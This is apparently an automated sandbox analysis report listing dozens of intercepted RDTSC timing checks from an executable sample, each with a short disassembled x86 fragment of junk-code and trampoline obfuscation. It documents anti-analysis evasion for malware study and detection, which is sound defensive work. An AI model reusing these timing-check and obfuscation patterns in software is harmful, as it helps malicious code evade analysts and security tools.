Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D0C6 second address: D4D154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 59454047h 0x00000010 mov edx, dword ptr [ebp+122D2A33h] 0x00000016 push 00000003h 0x00000018 sub dword ptr [ebp+122D269Fh], esi 0x0000001e mov dl, ch 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F99D0D12E18h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c mov ecx, dword ptr [ebp+122D2CEFh] 0x00000042 push 00000003h 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007F99D0D12E18h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 00000018h 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov cl, 9Eh 0x00000060 jmp 00007F99D0D12E29h 0x00000065 call 00007F99D0D12E19h 0x0000006a pushad 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D296 second address: D4D2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edx 0x00000008 jo 00007F99D0DE6F26h 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D2AE second address: D4D2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D2B3 second address: D4D2DF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99D0DE6F28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 ja 00007F99D0DE6F4Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F99D0DE6F34h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D2DF second address: D4D31C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push esi 0x0000000c jmp 00007F99D0D12E28h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F99D0D12E1Bh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D41774 second address: D4177A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4177A second address: D41789 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99D0D12E16h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6BDDD second address: D6BE01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F99D0DE6F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007F99D0DE6F2Ah 0x00000012 pop ecx 0x00000013 popad 0x00000014 push edi 0x00000015 jo 00007F99D0DE6F2Eh 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6BF62 second address: D6BF6C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99D0D12E22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6BF6C second address: D6BF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F99D0DE6F26h 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C383 second address: D6C389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C389 second address: D6C399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F99D0DE6F26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C4E7 second address: D6C505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F99D0D12E22h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C505 second address: D6C50F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F99D0DE6F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C50F second address: D6C53F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F99D0D12E25h 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C53F second address: D6C54A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C7FB second address: D6C817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E20h 0x00000007 jp 00007F99D0D12E1Eh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C9E5 second address: D6CA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F99D0DE6F2Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pushad 0x0000000e jg 00007F99D0DE6F28h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6CCE3 second address: D6CCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0D12E1Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6CCF9 second address: D6CCFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D649B9 second address: D649C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 je 00007F99D0D12E16h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D649C5 second address: D649C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6CFDB second address: D6CFDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6CFDF second address: D6CFE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D55F second address: D6D580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F99D0D12E16h 0x0000000a jmp 00007F99D0D12E27h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D580 second address: D6D58A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99D0DE6F26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D9BE second address: D6D9C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6DC99 second address: D6DCCF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99D0DE6F2Ch 0x0000000d pop edx 0x0000000e pushad 0x0000000f push edx 0x00000010 jmp 00007F99D0DE6F30h 0x00000015 jmp 00007F99D0DE6F2Ah 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6DCCF second address: D6DCD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7224E second address: D72253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D72253 second address: D72258 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D72258 second address: D72299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jo 00007F99D0DE6F28h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d jmp 00007F99D0DE6F32h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jnl 00007F99D0DE6F2Ch 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70B39 second address: D70B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7125A second address: D71260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7377A second address: D73783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D73783 second address: D73787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D73787 second address: D73797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F99D0D12E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D73797 second address: D7379B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7379B second address: D737A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7865E second address: D78662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78662 second address: D7867A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push ebx 0x00000008 jnp 00007F99D0D12E18h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F99D0D12E16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78912 second address: D78918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78918 second address: D78925 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F99D0D12E16h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78D59 second address: D78D63 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99D0DE6F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78D63 second address: D78D6D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99D0D12E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79025 second address: D79033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F99D0DE6F26h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7AF0D second address: D7AFAB instructions: 0x00000000 rdtsc 0x00000002 je 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jng 00007F99D0D12E39h 0x00000015 pop eax 0x00000016 mov dword ptr [ebp+122D316Eh], ecx 0x0000001c call 00007F99D0D12E19h 0x00000021 push eax 0x00000022 pushad 0x00000023 jmp 00007F99D0D12E25h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b pop eax 0x0000002c push eax 0x0000002d push edi 0x0000002e jnl 00007F99D0D12E1Ch 0x00000034 pop edi 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 jmp 00007F99D0D12E28h 0x0000003e mov eax, dword ptr [eax] 0x00000040 push eax 0x00000041 push edx 0x00000042 jg 00007F99D0D12E1Ch 0x00000048 je 00007F99D0D12E16h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B260 second address: D7B27D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B27D second address: D7B2AB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99D0D12E2Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F99D0D12E1Bh 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B456 second address: D7B45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B51A second address: D7B525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B5F5 second address: D7B5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B6E0 second address: D7B6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C1FE second address: D7C202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C283 second address: D7C2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0D12E1Fh 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F99D0D12E18h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push eax 0x00000028 push ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b ja 00007F99D0D12E16h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C7A5 second address: D7C7AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7D160 second address: D7D16A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7D16A second address: D7D170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7D170 second address: D7D174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7E278 second address: D7E315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F99D0DE6F32h 0x0000000d jmp 00007F99D0DE6F35h 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F99D0DE6F28h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e movzx esi, bx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F99D0DE6F28h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f call 00007F99D0DE6F37h 0x00000054 pop edi 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 js 00007F99D0DE6F2Ch 0x0000005e jo 00007F99D0DE6F26h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EB5A second address: D7EB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F5F8 second address: D7F5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EB5E second address: D7EB68 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F860 second address: D7F864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F5FE second address: D7F602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EB68 second address: D7EB8E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99D0DE6F37h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F99D0DE6F28h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F864 second address: D7F885 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F99D0D12E23h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F602 second address: D7F606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EB8E second address: D7EBA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0D12E22h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D801F1 second address: D801F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80ECC second address: D80ED2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80C8F second address: D80CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F99D0DE6F37h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jnp 00007F99D0DE6F26h 0x00000015 jmp 00007F99D0DE6F2Dh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80ED2 second address: D80EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0D12E24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80EEA second address: D80F77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F99D0DE6F2Bh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F99D0DE6F28h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c cmc 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F99D0DE6F28h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b mov edi, dword ptr [ebp+122D2956h] 0x00000051 or dword ptr [ebp+122D195Eh], edx 0x00000057 xchg eax, ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F99D0DE6F39h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8190B second address: D819B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F99D0D12E2Dh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F99D0D12E18h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b jmp 00007F99D0D12E1Ah 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D1B61h], edi 0x00000038 mov di, dx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007F99D0D12E18h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 je 00007F99D0D12E19h 0x0000005d movsx edi, cx 0x00000060 push esi 0x00000061 pop edi 0x00000062 xchg eax, ebx 0x00000063 jmp 00007F99D0D12E1Eh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D819B9 second address: D819C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D819C0 second address: D819C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8206C second address: D82092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jng 00007F99D0DE6F26h 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D82092 second address: D820A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F99D0D12E16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D820A0 second address: D820A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D86A85 second address: D86A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D86A89 second address: D86A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
